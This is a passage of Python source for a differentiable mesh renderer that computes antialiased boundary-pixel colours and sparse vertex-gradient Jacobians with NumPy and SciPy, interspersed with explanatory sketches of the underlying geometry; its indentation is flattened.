boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
nsamples = self.nsamples
if np.any(boundaryImage):
boundaryFaces = visibility[(boundaryImage) & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
edgeFaces = np.tile(self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]][None, :, :], [self.nsamples, 1, 1])
edgeSampled = np.any((edgeFaces[:, :, 0] == sampleFaces) | (edgeFaces[:, :, 1] == sampleFaces), 0)
facesInsideBnd = projFacesBndTiled == sampleFaces
wrongBnd = ~edgeSampled
# wrongBnd = np.all(facesInsideBnd, 0)
whereBnd = np.where(boundaryImage.ravel())[0]
# boundaryImage.ravel()[whereBnd[wrongBnd]] = False
if np.any(boundaryImage):
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 2])
# sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
boundaryFaces = visibility[boundaryImage & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
frontFacing = self.frontFacingEdgeFaces[(zerosIm * boundaryImage).ravel().astype(bool)].astype(bool)
frontFacingEdgeFaces = self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]][frontFacing]
vertsPerFaceProjBnd = self.camera.r[f[frontFacingEdgeFaces.ravel()].ravel()].reshape([1, -1, 2])
vertsPerFaceProjBnd = np.tile(vertsPerFaceProjBnd, [self.nsamples, 1, 1])
vertsPerFaceProjBnd = vertsPerFaceProjBnd.reshape([-1, 3, 2])[facesOutsideBnd.ravel()]
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_edge = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_edge[t_area_bnd_edge > 1] = 1
# if self.debug:
# import pdb; pdb.set_trace()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_outside = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_outside[t_area_bnd_outside > 1] = 1
faces = f[sampleFaces[facesInsideBnd]].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_inside = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_inside[t_area_bnd_inside > 1] = 1
#Trick to cap to 1 while keeping gradients.
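The `t_area_bnd_*` values above are standard projected-triangle areas: half the absolute determinant of the homogeneous 2D vertex matrix, capped at 1 so they act as bounded weights. A minimal standalone sketch (the function name here is illustrative, not part of the class):

```python
import numpy as np

def triangle_area_2d(p0, p1, p2):
    # Half the absolute determinant of the homogeneous vertex matrix,
    # mirroring the np.linalg.det(...) * 0.5 expressions above.
    m = np.array([[p0[0], p0[1], 1.0],
                  [p1[0], p1[1], 1.0],
                  [p2[0], p2[1], 1.0]])
    return abs(np.linalg.det(m)) * 0.5

# Capped at 1, like t_area_bnd_* above.
area = min(triangle_area_2d([0, 0], [1, 0], [0, 1]), 1.0)
```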
p1 = vertsProjBndSamplesOutside[:,0,:]
p2 = vertsProjBndSamplesOutside[:,1,:]
p = sampleV[facesOutsideBnd]
l = (p2 - p1)
linedist = np.sqrt((np.sum(l**2,axis=1)))[:,None]
self.linedist = linedist
lnorm = l/linedist
self.lnorm = lnorm
v1 = p - p1
self.v1 = v1
d = v1[:,0]* lnorm[:,0] + v1[:,1]* lnorm[:,1]
self.d = d
intersectPoint = p1 + d[:,None] * lnorm
self.intersectPoint = intersectPoint
v2 = p - p2
self.v2 = v2
l12 = (p1 - p2)
linedist12 = np.sqrt((np.sum(l12**2,axis=1)))[:,None]
lnorm12 = l12/linedist12
d2 = v2[:,0]* lnorm12[:,0] + v2[:,1]* lnorm12[:,1]
nonIntersect = (d2 < 0) | (d<0)
self.nonIntersect = nonIntersect
argminDistNonIntersect = np.argmin(np.c_[d[nonIntersect], d2[nonIntersect]], 1)
self.argminDistNonIntersect = argminDistNonIntersect
intersectPoint[nonIntersect] = vertsProjBndSamplesOutside[nonIntersect][np.arange(nonIntersect.sum()), argminDistNonIntersect]
lineToPoint = p - intersectPoint
dist = np.sqrt(np.sum(lineToPoint ** 2, axis=1))[:, None]
n_norm = lineToPoint / dist
self.n_norm = n_norm
self.dist = dist
d_final = dist.squeeze()
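The block above computes the unsigned distance from each sample point to its boundary edge, snapping to the nearest endpoint when the perpendicular foot falls outside the segment (the `nonIntersect` case). The same geometry as a self-contained sketch (illustrative name):

```python
import numpy as np

def point_to_segment_distance(p, p1, p2):
    # Project p onto the segment direction and clamp the parameter to
    # [0, 1], so points beyond an endpoint snap to that endpoint,
    # mirroring the nonIntersect handling above.
    p, p1, p2 = (np.asarray(a, dtype=float) for a in (p, p1, p2))
    l = p2 - p1
    t = np.clip(np.dot(p - p1, l) / np.dot(l, l), 0.0, 1.0)
    closest = p1 + t * l
    return np.linalg.norm(p - closest)
```

Perpendicular case: (0.5, 1) is distance 1 from the segment (0,0)-(1,0); endpoint case: (2, 0) is also distance 1 from that segment.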
# max_nx_ny = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final = d_final/max_nx_ny
# d_final = d_final
verticesBnd = self.v.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 3])
verticesBndSamples = np.tile(verticesBnd[None, :, :], [self.nsamples, 1, 1, 1])
verticesBndOutside = verticesBndSamples[facesOutsideBnd]
vc = self.vc.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 3])
# Clamp vertex colours to the valid [0, 1] range.
vc[vc > 1] = 1
vc[vc < 0] = 0
vcBnd = vc
vcBndSamples = np.tile(vcBnd[None, :, :], [self.nsamples, 1, 1, 1])
vcBndOutside = vcBndSamples[facesOutsideBnd]
invViewMtx = np.linalg.inv(np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])])
#
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
# invCamMtx = np.r_[np.c_[np.linalg.inv(self.camera.camera_mtx), np.array([0,0,0])], np.array([[0, 0, 0, 1]])]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
verticesBndOutside = np.concatenate([verticesBndOutside.reshape([-1,3]), np.ones([verticesBndOutside.size//3, 1])], axis=1)
projVerticesBndOutside = (camMtx.dot(view_mtx)).dot(verticesBndOutside.T).T[:,:3].reshape([-1,2,3])
projVerticesBndDir = projVerticesBndOutside[:,1,:] - projVerticesBndOutside[:,0,:]
projVerticesBndDir = projVerticesBndDir/np.sqrt((np.sum(projVerticesBndDir ** 2, 1)))[:, None]
dproj = (intersectPoint[:,0]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,0]) / (projVerticesBndDir[:,0] - projVerticesBndDir[:,2]*intersectPoint[:,0])
# Code to check computation that dproj == dprojy
# dproj_y = (intersectPoint[:,1]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,1]) / (projVerticesBndDir[:,1] - projVerticesBndDir[:,2]*intersectPoint[:,1])
projPoint = projVerticesBndOutside[:,0,:][:,: ] + dproj[:,None]*projVerticesBndDir[:,:]
projPointVec4 = np.concatenate([projPoint, np.ones([projPoint.shape[0],1])], axis=1)
viewPointIntersect = (invViewMtx.dot(np.linalg.inv(camMtx)).dot(projPointVec4.T.reshape([4,-1])).reshape([4,-1])).T[:,:3]
barycentricVertsDistIntesect = np.linalg.norm(viewPointIntersect - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,0,:], axis=1)
barycentricVertsDistIntesect2 = np.linalg.norm(viewPointIntersect - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,1,:], axis=1)
# Code to check barycentricVertsDistIntesect + barycentricVertsDistIntesect2 = barycentricVertsDistEdge
barycentricVertsDistEdge = np.linalg.norm(verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,0,:] - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,1,:], axis=1)
nonIntersect = np.abs(barycentricVertsDistIntesect + barycentricVertsDistIntesect2 - barycentricVertsDistEdge) > 1e-4
argminDistNonIntersect = np.argmin(np.c_[barycentricVertsDistIntesect[nonIntersect], barycentricVertsDistIntesect2[nonIntersect]],1)
barycentricVertsIntersect = barycentricVertsDistIntesect2 / (barycentricVertsDistIntesect + barycentricVertsDistIntesect2)
barycentricVertsIntersect[nonIntersect] = np.array(argminDistNonIntersect == 0).astype(np.float64)
self.barycentricVertsIntersect = barycentricVertsIntersect
self.viewPointIntersect = viewPointIntersect
self.viewPointIntersect[nonIntersect] = verticesBndOutside.reshape([-1, 2, 4])[nonIntersect, :, 0:3][np.arange(nonIntersect.sum()), argminDistNonIntersect, :]
vcEdges1 = barycentricVertsIntersect[:, None] * vcBndOutside.reshape([-1, 2, 3])[:, 0, :]
vcEdges2 = (1 - barycentricVertsIntersect[:, None]) * vcBndOutside.reshape([-1, 2, 3])[:, 1, :]
#Color:
colorVertsEdge = vcEdges1 + vcEdges2
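`colorVertsEdge` is a linear blend of the two edge-vertex colours by the 1D barycentric coordinate of the intersection point; a coordinate of 1 selects the first vertex. As a standalone sketch (illustrative names):

```python
import numpy as np

def edge_color(bary, vc0, vc1):
    # bary weights the first edge vertex, (1 - bary) the second,
    # matching vcEdges1 + vcEdges2 above.
    return bary * np.asarray(vc0, dtype=float) + (1.0 - bary) * np.asarray(vc1, dtype=float)

c = edge_color(0.25, [1.0, 0.0, 0.0], [0.0, 0.0, 1.0])
```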
#Point IN edge barycentric
d_finalNP = np.minimum(d_final.copy(),1.)
self.d_final_outside = d_finalNP
self.t_area_bnd_outside = t_area_bnd_outside
self.t_area_bnd_edge = t_area_bnd_edge
self.t_area_bnd_inside = t_area_bnd_inside
areaWeights = np.zeros([nsamples, nBndFaces])
areaWeights[facesOutsideBnd] = (1-d_finalNP)*t_area_bnd_edge + d_finalNP *t_area_bnd_outside
areaWeights[facesInsideBnd] = t_area_bnd_inside
areaWeightsTotal = areaWeights.sum(0)
# areaWeightsTotal[areaWeightsTotal < 1] = 1
self.areaWeightsTotal = areaWeightsTotal
finalColorBndOutside = np.zeros([self.nsamples, boundaryFaces.size, 3])
finalColorBndOutside_edge = np.zeros([self.nsamples, boundaryFaces.size, 3])
finalColorBndInside = np.zeros([self.nsamples, boundaryFaces.size, 3])
sampleColorsOutside = sampleColors[facesOutsideBnd]
self.sampleColorsOutside = sampleColors.copy()
finalColorBndOutside[facesOutsideBnd] = sampleColorsOutside / self.nsamples
self.finalColorBndOutside_for_dr = finalColorBndOutside.copy()
# finalColorBndOutside[facesOutsideBnd] *= d_finalNP[:, None] * t_area_bnd_outside[:, None]
finalColorBndOutside[facesOutsideBnd] *= d_finalNP[:, None]
finalColorBndOutside_edge[facesOutsideBnd] = colorVertsEdge / self.nsamples
self.finalColorBndOutside_edge_for_dr = finalColorBndOutside_edge.copy()
# finalColorBndOutside_edge[facesOutsideBnd] *= (1 - d_finalNP[:, None]) * t_area_bnd_edge[:, None]
finalColorBndOutside_edge[facesOutsideBnd] *= (1 - d_finalNP[:, None])
sampleColorsInside = sampleColors[facesInsideBnd]
self.sampleColorsInside = sampleColorsInside.copy()
# finalColorBndInside[facesInsideBnd] = sampleColorsInside * self.t_area_bnd_inside[:, None]
finalColorBndInside[facesInsideBnd] = sampleColorsInside / self.nsamples
finalColorBnd = finalColorBndOutside + finalColorBndOutside_edge + finalColorBndInside
# finalColorBnd /= areaWeightsTotal[None, :, None]
bndColorsImage = np.zeros_like(self.render_resolved)
bndColorsImage[(zerosIm * boundaryImage), :] = np.sum(finalColorBnd, axis=0)
# bndColorsImage1 = np.zeros_like(self.render_resolved)
# bndColorsImage1[(zerosIm * boundaryImage), :] = np.sum(self.finalColorBndOutside_for_dr, axis=0)
#
# bndColorsImage2 = np.zeros_like(self.render_resolved)
# bndColorsImage2[(zerosIm * boundaryImage), :] = np.sum(self.finalColorBndOutside_edge_for_dr, axis=0)
#
# bndColorsImage3 = np.zeros_like(self.render_resolved)
# bndColorsImage3[(zerosIm * boundaryImage), :] = np.sum(finalColorBndInside, axis=0)
finalColorImageBnd = bndColorsImage
if np.any(boundaryImage):
finalColor = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * finalColorImageBnd
# finalColor1 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage1
# finalColor2 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage2
# finalColor3 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage3
else:
finalColor = self.color_image
finalColor[finalColor>1] = 1
finalColor[finalColor<0] = 0
return finalColor
def compute_derivatives_verts(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
"""Construct a sparse jacobian that relates 2D projected vertex positions
(in the columns) to pixel values (in the rows)."""
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
n_norm = self.n_norm
dist = self.dist
linedist = self.linedist
d = self.d
v1 = self.v1
lnorm = self.lnorm
finalColorBndOutside_for_dr = self.finalColorBndOutside_for_dr
finalColorBndOutside_edge_for_dr = self.finalColorBndOutside_edge_for_dr
d_final_outside = self.d_final_outside
barycentricVertsIntersect = self.barycentricVertsIntersect
# xdiff = dEdx
# ydiff = dEdy
nVisF = len(visibility.ravel()[visible])
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 2])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
p1 = vertsProjBndSamplesOutside[:, 0, :]
p2 = vertsProjBndSamplesOutside[:, 1, :]
p = sampleV[facesOutsideBnd]
#Computing gradients:
#A multisampled pixel color is given by: w R + (1-w) R' thus:
#1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
#2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
#3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
#4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
#5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
#6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
#7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
#for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
#Finally, stack data, and IJ of nonbnd with bnd on both dwrt_v and dwrt_vc.
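The blending model listed in the comments above can be checked numerically: a boundary pixel is I(w) = w*R + (1-w)*R', so dI/dw = R - R' (term 1), dI/dR = w (terms 2 and 4) and dI/dR' = 1 - w (terms 3 and 5). A small finite-difference sanity check with made-up colours:

```python
import numpy as np

R = np.array([0.9, 0.2, 0.1])    # sample (face) colour, illustrative
Rp = np.array([0.1, 0.1, 0.8])   # edge colour R', illustrative
w = 0.3                          # coverage weight

I = w * R + (1.0 - w) * Rp       # blended boundary-pixel colour
dI_dw = R - Rp                   # analytic derivative wrt the weight

# Finite-difference check of dI/dw.
eps = 1e-6
fd = ((w + eps) * R + (1.0 - w - eps) * Rp - I) / eps
```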
######## 1 derivatives samples outside wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# #Chumpy autodiff code to check derivatives here:
# chEdgeVerts = ch.Ch(vertsProjBndSamplesOutside)
#
# chEdgeVerts1 = chEdgeVerts[:,0,:]
# chEdgeVerts2 = chEdgeVerts[:,1,:]
#
# chSampleVerts = ch.Ch(sampleV[facesOutsideBnd])
# # c1 = (chEdgeVerts1 - chSampleVerts)
# # c2 = (chEdgeVerts2 - chSampleVerts)
# # n = (chEdgeVerts2 - chEdgeVerts1)
#
# #Code to check computation of distance below
# # d2 = ch.abs(c1[:,:,0]*c2[:,:,1] - c1[:,:,1]*c2[:,:,0]) / ch.sqrt((ch.sum(n**2,2)))
# # # np_mat = ch.dot(ch.array([[0,-1],[1,0]]), n)
# # np_mat2 = -ch.concatenate([-n[:,:,1][:,:,None], n[:,:,0][:,:,None]],2)
# # np_vec2 = np_mat2 / ch.sqrt((ch.sum(np_mat2**2,2)))[:,:,None]
# # d2 = d2 / ch.maximum(ch.abs(np_vec2[:,:,0]),ch.abs(np_vec2[:,:,1]))
#
# chl = (chEdgeVerts2 - chEdgeVerts1)
# chlinedist = ch.sqrt((ch.sum(chl**2,axis=1)))[:,None]
# chlnorm = chl/chlinedist
#
# chv1 = chSampleVerts - chEdgeVerts1
# chd = chv1[:,0]* chlnorm[:,0] + chv1[:,1]* chlnorm[:,1]
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
# # intersectPointDist1 = intersectPoint - chEdgeVerts1
# # intersectPointDist2 = intersectPoint - chEdgeVerts2
# # Code to check computation of distances below:
# # lengthIntersectToPoint1 = np.linalg.norm(intersectPointDist1.r,axis=1)
# # lengthIntersectToPoint2 = np.linalg.norm(intersectPointDist2.r,axis=1)
#
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
#
# chlineToPoint = (chSampleVerts - chintersectPoint)
# chn_norm = chlineToPoint / ch.sqrt((ch.sum(chlineToPoint ** 2, axis=1)))[:, None]
#
# chdist = chlineToPoint[:,0]*chn_norm[:,0] + chlineToPoint[:,1]*chn_norm[:,1]
#
# d_final_ch = chdist / ch.maximum(ch.abs(chn_norm[:, 0]), ch.abs(chn_norm[:, 1]))
#
# d_final_outside = d_final_ch.ravel()
# dwdv = d_final_outside.dr_wrt(chEdgeVerts1)
# rows = np.tile(np.arange(d_final_outside.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_outside.shape[0] * 2)
#
# dwdv_r_v1 = np.array(dwdv[rows, cols]).reshape([-1, 2])
#
# dwdv = d_final_outside.dr_wrt(chEdgeVerts2)
# rows = np.tile(np.arange(d_final_ch.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_ch.shape[0] * 2)
#
# dwdv_r_v2 = np.array(dwdv[rows, cols]).reshape([-1, 2])
nonIntersect = self.nonIntersect
argminDistNonIntersect = self.argminDistNonIntersect
max_dx_dy = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final_np = dist / max_dx_dy
d_final_np = dist
ident = np.identity(2)
ident = np.tile(ident[None, :], [len(p2), 1, 1])
dlnorm = (ident - np.einsum('ij,ik->ijk', lnorm, lnorm)) / linedist[:, None]
dl_normdp1 = np.einsum('ijk,ikl->ijl', dlnorm, -ident)
dl_normdp2 = np.einsum('ijk,ikl->ijl', dlnorm, ident)
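`dlnorm` above is the Jacobian of vector normalisation, d(l/|l|)/dl = (I - n n^T)/|l| with n = l/|l|. A standalone sketch with a finite-difference check (illustrative function name):

```python
import numpy as np

def normalize_jacobian(l):
    # (I - n n^T) / |l|, the same expression as dlnorm above.
    l = np.asarray(l, dtype=float)
    mag = np.linalg.norm(l)
    n = l / mag
    return (np.eye(l.size) - np.outer(n, n)) / mag

l = np.array([3.0, 4.0])
J = normalize_jacobian(l)

# Finite-difference check of each column.
eps = 1e-6
fd = np.empty((2, 2))
for j in range(2):
    dl = np.zeros(2)
    dl[j] = eps
    fd[:, j] = ((l + dl) / np.linalg.norm(l + dl) - l / np.linalg.norm(l)) / eps
```

Note that J @ l is zero: normalisation is invariant to scaling along l, so the Jacobian annihilates the radial direction.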
dv1dp1 = -ident
dv1dp2 = 0
dddp1 = np.einsum('ijk,ij->ik', dv1dp1, lnorm) + np.einsum('ij,ijl->il', v1, dl_normdp1)
dddp2 = 0 + np.einsum('ij,ijl->il', v1, dl_normdp2)
dipdp1 = ident + (dddp1[:,None,:]*lnorm[:,:,None]) + d[:,None,None]*dl_normdp1
dipdp2 = (dddp2[:,None,:]*lnorm[:,:,None]) + d[:,None,None]*dl_normdp2
dndp1 = -dipdp1
dndp2 = -dipdp2
dn_norm = (ident - np.einsum('ij,ik->ijk', n_norm, n_norm)) / dist[:,None]
dn_normdp1 = np.einsum('ijk,ikl->ijl', dn_norm, dndp1)
dn_normdp2 = np.einsum('ijk,ikl->ijl', dn_norm, dndp2)
ddistdp1 = np.einsum('ij,ijl->il', n_norm, dndp1)
ddistdp2 = np.einsum('ij,ijl->il', n_norm, dndp2)
argmax_nx_ny = np.argmax(np.abs(n_norm),axis=1)
dmax_nx_ny_p1 = np.sign(n_norm)[np.arange(len(n_norm)),argmax_nx_ny][:,None]*dn_normdp1[np.arange(len(dn_normdp1)),argmax_nx_ny]
dmax_nx_ny_p2 = np.sign(n_norm)[np.arange(len(n_norm)),argmax_nx_ny][:,None]*dn_normdp2[np.arange(len(dn_normdp2)),argmax_nx_ny]
# dd_final_dp1 = -1./max_dx_dy[:,None]**2 * dmax_nx_ny_p1 * dist + 1./max_dx_dy[:,None] * ddistdp1
# dd_final_dp2 = -1./max_dx_dy[:,None]**2 * dmax_nx_ny_p2 * dist + 1./max_dx_dy[:,None] * ddistdp2
dd_final_dp1 = ddistdp1
dd_final_dp2 = ddistdp2
#For those non intersecting points straight to the edge:
v1 = self.v1[nonIntersect][argminDistNonIntersect==0]
v1_norm = v1/np.sqrt((np.sum(v1**2,axis=1)))[:,None]
dd_final_dp1_nonintersect = -v1_norm
v2 = self.v2[nonIntersect][argminDistNonIntersect==1]
v2_norm = v2/np.sqrt((np.sum(v2**2,axis=1)))[:,None]
dd_final_dp2_nonintersect = -v2_norm
# Chained fancy indexing (a[mask][mask2] = v) writes into a copy and is a
# no-op, so assign through a temporary and write it back in one step.
tmp1 = dd_final_dp1[nonIntersect]
tmp1[argminDistNonIntersect == 0] = dd_final_dp1_nonintersect
tmp1[argminDistNonIntersect == 1] = 0
dd_final_dp1[nonIntersect] = tmp1
tmp2 = dd_final_dp2[nonIntersect]
tmp2[argminDistNonIntersect == 1] = dd_final_dp2_nonintersect
tmp2[argminDistNonIntersect == 0] = 0
dd_final_dp2[nonIntersect] = tmp2
dImage_wrt_outside_v1 = finalColorBndOutside_for_dr[facesOutsideBnd][:,:,None]*dd_final_dp1[:,None,:] - dd_final_dp1[:,None,:]*finalColorBndOutside_edge_for_dr[facesOutsideBnd][:,:,None]
dImage_wrt_outside_v2 = finalColorBndOutside_for_dr[facesOutsideBnd][:,:,None]*dd_final_dp2[:,None,:] - dd_final_dp2[:,None,:]*finalColorBndOutside_edge_for_dr[facesOutsideBnd][:,:,None]
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2*2)).ravel()
# faces = f[sampleFaces[facesOutsideBnd]].ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()
faces = np.tile(faces.reshape([1, -1, 2]), [self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data1 = dImage_wrt_outside_v1.transpose([1,0,2])
data2 = dImage_wrt_outside_v2.transpose([1,0,2])
data = np.concatenate([data1[:,:,None,:], data2[:,:,None,:]], 2)
data = data.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd_outside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
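The IS/JS/data pattern used throughout relies on SciPy's COO-style constructor summing duplicate (row, col) entries, which is what accumulates the per-sample gradient contributions into a single jacobian. A minimal illustration (toy indices, not the renderer's):

```python
import numpy as np
import scipy.sparse as sp

rows = np.array([0, 0, 1])         # pixel (row) indices; (0, 2) appears twice
cols = np.array([2, 2, 3])         # flattened vertex-coordinate (column) indices
data = np.array([0.5, 0.25, 1.0])  # per-sample gradient contributions

# Duplicate (row, col) entries are summed when the matrix is built.
J = sp.csc_matrix((data, (rows, cols)), shape=(2, 4))
```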
######## 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
######## 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
verticesBnd = self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3])
sampleBarycentricBar = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([-1, 3, 1])
verts = np.sum(self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3, 3]) * sampleBarycentricBar, axis=1)
dImage_wrt_bar_v = self.barycentricDerivatives(verticesBnd, f[sampleFaces.ravel()], verts).swapaxes(0,1)
dImage_wrt_bar_v[facesOutsideBnd.ravel()] = dImage_wrt_bar_v[facesOutsideBnd.ravel()] * d_final_outside[:,None,None, None] * self.t_area_bnd_outside[:, None, None, None]
dImage_wrt_bar_v[facesInsideBnd.ravel()] = dImage_wrt_bar_v[facesInsideBnd.ravel()] * self.t_area_bnd_inside[:, None, None, None]
# dImage_wrt_bar_v /= np.tile(areaWeightsTotal[None,:], [self.nsamples,1]).ravel()[:, None,None, None]
dImage_wrt_bar_v /= self.nsamples
### Derivatives wrt V: 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
# data = np.tile(dImage_wrt_bar_v[facesOutsideBnd.ravel()][None,:],[3,1,1,1]).ravel()
